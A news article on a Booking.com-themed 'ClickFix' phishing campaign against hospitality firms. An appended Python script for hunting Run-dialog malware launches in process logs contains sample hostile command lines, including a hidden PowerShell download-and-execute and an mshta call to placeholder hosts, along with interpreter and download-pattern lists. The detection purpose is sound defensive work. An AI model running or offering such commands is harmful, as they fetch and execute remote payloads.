‘ClickFix’ campaign targets hospitality firms with phishing attacks

A novel twist on social-engineering attacks is causing havoc for hospitality providers.

The security research team at Microsoft said that a threat actor tracked as Storm-1865 is behind an ongoing phishing campaign that impersonates the travel site Booking.com. The targets are hospitality companies that are most likely to be working with Booking.com directly.

The targeted organizations are located in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe. The ultimate aim of the operation appears to be the theft of financial accounts and login credentials, according to analysis of the malware payloads.

While targeted phishing attacks are nothing new, what stood out to the Microsoft research team was the way in which the attackers get their malware onto the targeted machines.

The threat actors use a technique known as “ClickFix.” In this type of attack, the victim is presented with a fake error message, pop-up or notification. The notification instructs the user either to visit a site or to copy and paste a command that leads to an exploit or a direct download of the malware package.

Such attacks are often more successful than other common methods because they not only catch the user off guard with a seemingly official notification from the operating system, but also let the attack proceed in a way that can fly under the radar of many anti-malware tools.

“This need for user interaction could allow an attack to slip through conventional and automated security features,” the researchers explained.

“In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.”

The phishing emails themselves take a number of forms, though all present themselves as being from Booking.com and are aimed at hospitality providers who are signed up to the site. Among the lures are notifications of bad reviews and account verification alerts.

Upon clicking a link in the message, the target is redirected to a site that serves a fake pop-up. In this case, the window presents itself as a CAPTCHA test. The test instructs the victim to copy a string of text and execute it with the Windows Run command. At that point, the malware is downloaded and executed.

Microsoft said that while the Storm-1865 group has been active for roughly two years, the ClickFix technique is a first for this particular cybercrime outfit.

“In 2023, Storm-1865 targeted hotel guests using Booking.com with similar social engineering techniques and malware. In 2024, Storm-1865 targeted buyers using e-commerce platforms with phishing messages leading to fraudulent payment webpages,” Microsoft noted.

“The addition of ClickFix to this threat actor’s tactics, techniques, and procedures (TTPs) shows how Storm-1865 is evolving its attack chains to try to slip through conventional security measures against phishing and malware.”
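The Run-dialog execution path described above gives defenders a concrete host-side signal to hunt for. The following Python is an added example, not code from the article or from Microsoft: it scans constructed process-creation records (loosely modelled on Sysmon Event ID 1 / Windows 4688 fields; the field names, paths, hostnames and every sample line are assumptions for illustration) and flags a scripting host or living-off-the-land binary spawned by explorer.exe, which is the parent of anything launched from the Run window, whose command line fetches or decodes remote content.

```python
"""Hunt for ClickFix-style execution: an interpreter launched from the Windows
Run dialog (parent explorer.exe) whose command line pulls a remote payload.

Added example; the log records below are constructed for illustration and do
not come from the Storm-1865 campaign. Field layout is an assumption modelled
on Sysmon Event ID 1 / Windows 4688 process-creation events.
"""
import re
from typing import Dict, List, Tuple

# Scripting hosts and LOLBins commonly pasted into the Run dialog
# (assumption: a starting list to tune, not an exhaustive one).
SUSPICIOUS_IMAGES = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe", "rundll32.exe", "regsvr32.exe",
}

# Command-line fragments that download, stage or decode remote content.
REMOTE_FETCH = re.compile(
    r"https?://|invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
    r"\biex\b|invoke-expression|frombase64string|-enc(odedcommand)?\b|"
    r"\burlcache\b|/transfer\b",
    re.IGNORECASE,
)

# key=value tokens; quoted values may contain spaces.
FIELD = re.compile(r'(\w+)=("([^"]*)"|(\S+))')

# Constructed sample records (hostnames use the reserved .invalid TLD).
SAMPLE_LOGS = [
    r'EventId=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\mshta.exe CommandLine="mshta https://captcha.example.invalid/verify"',
    r'EventId=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -c iwr https://cdn.example.invalid/p.ps1 | iex"',
    r'EventId=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine="notepad C:\Users\front-desk\notes.txt"',
    r'EventId=1 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\curl.exe CommandLine="curl -o C:\Temp\tool.exe https://mirror.example.invalid/tool.exe"',
    r'EventId=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell"',
]


def parse_record(line: str) -> Dict[str, str]:
    """Parse one key=value record into a dict, honouring double quotes."""
    return {
        m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
        for m in FIELD.finditer(line)
    }


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(rec: Dict[str, str]) -> List[str]:
    """Return the independent suspicious signals present in one record."""
    reasons: List[str] = []
    parent = basename(rec.get("ParentImage", ""))
    image = basename(rec.get("Image", ""))
    cmd = rec.get("CommandLine", "")
    if parent == "explorer.exe" and image in SUSPICIOUS_IMAGES:
        reasons.append("interpreter spawned by explorer.exe (Run dialog / shell)")
    if REMOTE_FETCH.search(cmd):
        reasons.append("command line fetches or decodes remote content")
    return reasons


def detect(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (index, command line, reasons) for records that show BOTH
    signals. Requiring both keeps ordinary Start-menu launches and
    scripted downloads from a cmd.exe parent out of the alert queue."""
    hits = []
    for idx, line in enumerate(lines):
        rec = parse_record(line)
        reasons = classify(rec)
        if len(reasons) == 2:
            hits.append((idx, rec.get("CommandLine", ""), reasons))
    return hits


if __name__ == "__main__":
    for idx, cmd, reasons in detect(SAMPLE_LOGS):
        print(f"record {idx}: {cmd}")
        for r in reasons:
            print(f"    - {r}")
```

Only the first two constructed records trip the rule: the mshta launch and the hidden PowerShell download-and-execute, both with explorer.exe as parent. The curl record is ignored because its parent is cmd.exe, and a bare `powershell` typed into the Run box is ignored because nothing is fetched. Because explorer.exe is also the parent of every Start-menu or double-click launch, the parent check alone is noisy; the remote-fetch requirement is what makes the rule usable, and the interpreter list and regex are the places to tune for a given estate. On the endpoint itself, the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a useful corroborating artifact when triaging a hit.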
